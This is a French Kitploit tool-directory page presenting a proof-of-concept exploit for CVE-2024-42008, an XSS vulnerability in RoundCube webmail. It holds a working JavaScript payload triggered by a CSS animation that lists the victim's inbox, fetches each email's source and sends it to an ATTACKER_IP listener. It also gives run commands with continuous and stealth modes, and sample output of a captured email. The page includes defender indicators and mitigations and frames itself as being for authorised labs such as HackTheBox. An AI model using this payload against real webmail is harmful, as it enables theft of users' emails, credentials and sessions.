Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Roundcube-CVE-2024-42008-POC — Preuve de concept d'exploitation pour CVE-2024-42008, une vulnérabilité de Cross-Site Scripting dans le webmail RoundCube. Distribue des charges utiles XSS via les formulaires de contact pour voler des emails, des identifiants et des jetons de session dans des environnements de test d'intrusion autorisés. | Kitploit
Outils/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebHameçonnageCTFApprentissage et Éducation
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

Voir le dépôt
19il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Preuve de concept d'exploitation pour CVE-2024-42008, une vulnérabilité de Cross-Site Scripting dans le webmail RoundCube. Distribue des charges utiles XSS via les formulaires de contact pour voler des emails, des identifiants et des jetons de session dans des environnements de test d'intrusion autorisés.

Partager

CVE-2024-42008 Exploit XSS RoundCube

Aperçu

Ce dépôt contient un exploit de preuve de concept pour CVE-2024-42008, une vulnérabilité de type Cross-Site Scripting (XSS) dans l'application webmail RoundCube. Cet exploit est conçu à des fins éducatives et pour des environnements de test d'intrusion contrôlés comme HackTheBox.

Détails de la vulnérabilité

Résumé de CVE-2024-42008

  • CVE ID: CVE-2024-42008
  • Type : Cross-Site Scripting (XSS)
  • Score CVSS : Élevé
  • Versions affectées :
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • Versions corrigées : 1.5.8, 1.6.8+

Détails techniques

La vulnérabilité existe dans rcmail_action_mail_get->run() et permet à des attaquants distants d'exécuter du JavaScript arbitraire dans le navigateur des victimes. Le défaut provient d'une validation insuffisante des entrées lors du traitement du contenu des e-mails, notamment dans la gestion des animations CSS et des contextes d'exécution JavaScript.

Vecteur d'attaque clé :

  • Contenu HTML malveillant injecté via des formulaires de contact ou des messages e-mail
  • Propriétés d'animation CSS utilisées pour déclencher l'exécution JavaScript
  • Les gestionnaires d'événements onanimationstart contournent les filtres de contenu
  • La charge utile JavaScript s'exécute dans le contexte de l'application webmail

Impact

Une exploitation réussie permet aux attaquants de :

  • Voler les e-mails de la victime depuis la boîte de réception et d'autres dossiers
  • Exfiltrer les métadonnées des e-mails (UIDs, listes de messages)
  • Accéder au code source des e-mails et aux pièces jointes
  • Envoyer des e-mails depuis le compte de la victime
  • Récolter les identifiants de connexion et les jetons de session
  • Effectuer des actions au nom de la victime

Analyse du script d'exploit

Architecture du script

L'exploit se compose de trois composants principaux :

  1. Livraison de la charge utile XSS : Envoie du HTML malveillant via le formulaire de contact
  2. Serveur HTTP : Écoute les données exfiltrées
  3. Traitement des données : Capture et journalise les e-mails volés

Décomposition de la charge utile

root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

Fonctionnalités clés

  • Opération continue : Peut envoyer des charges utiles à intervalles réguliers
  • Mode furtif : Empreinte minimale et gestion des erreurs
  • Journalisation des données : Capture et stockage automatiques des e-mails exfiltrés
  • Mode débogage : Support proxy pour l'analyse du trafic
  • Configurable : Plusieurs options en ligne de commande

Utilisation

Prérequis

root@kitploit:~
pip install requests

Utilisation de base

root@kitploit:~
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d

Configuration

Modifier le script pour configurer :

  • ATTACKER_IP : L'adresse IP de votre serveur d'écoute
  • ATTACKER_PORT : Port pour recevoir les données exfiltrées
  • RECIPIENT_EMAIL : Adresse e-mail cible
  • TARGET_URL : Instance RoundCube vulnérable
  • PROXY : Serveur proxy pour le débogage (Burp Suite/Caido)

Options en ligne de commande

OptionDescription
-d, --debugActiver le mode débogage avec support proxy
-c, --continuousEnvoyer les charges utiles en continu
-i, --intervalIntervalle entre les charges utiles (par défaut : 30s)

Déroulement de l'attaque

  1. Injection de la charge utile : Le script envoie du HTML malveillant via le formulaire de contact
  2. Livraison de l'e-mail : Le RoundCube vulnérable traite et délivre l'e-mail
  3. Interaction de la victime : L'utilisateur ouvre/consulte l'e-mail malveillant
  4. Exécution XSS : L'animation CSS déclenche la charge utile JavaScript
  5. Exfiltration des données : Le JavaScript vole les e-mails et les envoie à l'attaquant
  6. Capture des données : Le serveur d'exploit reçoit et journalise les données volées

Détection et atténuation

Pour les défenseurs

Indicateurs de détection :

  • Propriétés d'animation CSS inhabituelles dans le contenu des e-mails
  • Gestionnaires d'événements onanimationstart dans le HTML
  • JavaScript suspect dans les messages e-mail
  • Requêtes sortantes vers des domaines inconnus depuis le webmail
  • Soumissions répétées de formulaires de contact

Stratégies d'atténuation :

  • Mettre à jour RoundCube vers la version 1.5.8 ou 1.6.8+
  • Implémenter une politique de sécurité du contenu (CSP)
  • Activer le filtrage du contenu des e-mails
  • Surveiller le trafic sortant suspect
  • Audits de sécurité réguliers des configurations du webmail

Pour les testeurs d'intrusion

Considérations de test :

  • Assurez-vous d'avoir une autorisation appropriée avant de tester
  • Documentez toutes les activités pour le rapport
  • Testez uniquement dans des environnements isolés
  • Vérifiez que la cible est intentionnellement vulnérable
  • Suivez les pratiques de divulgation responsable

Considérations juridiques et éthiques

⚠️ AVERTISSEMENT : Cet exploit est fourni à des fins éducatives et de test autorisé uniquement.

  • Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test
  • Conçu pour HackTheBox et des plateformes d'apprentissage similaires
  • Une utilisation non autorisée peut violer les lois locales et internationales
  • Suivez toujours les pratiques de divulgation responsable
  • Respectez la vie privée et les réglementations sur la protection des données

Références techniques

  • Entrée officielle CVE-2024-42008
  • Avis de sécurité RoundCube
  • CWE-79 : Cross-site Scripting

Exemple de sortie

root@kitploit:~
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

Avertissement

Ce code est fourni à des fins éducatives et de test d'intrusion autorisé uniquement. Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par ce logiciel. Assurez-vous toujours d'avoir une autorisation appropriée avant de tester un système.

Télécharger l’outil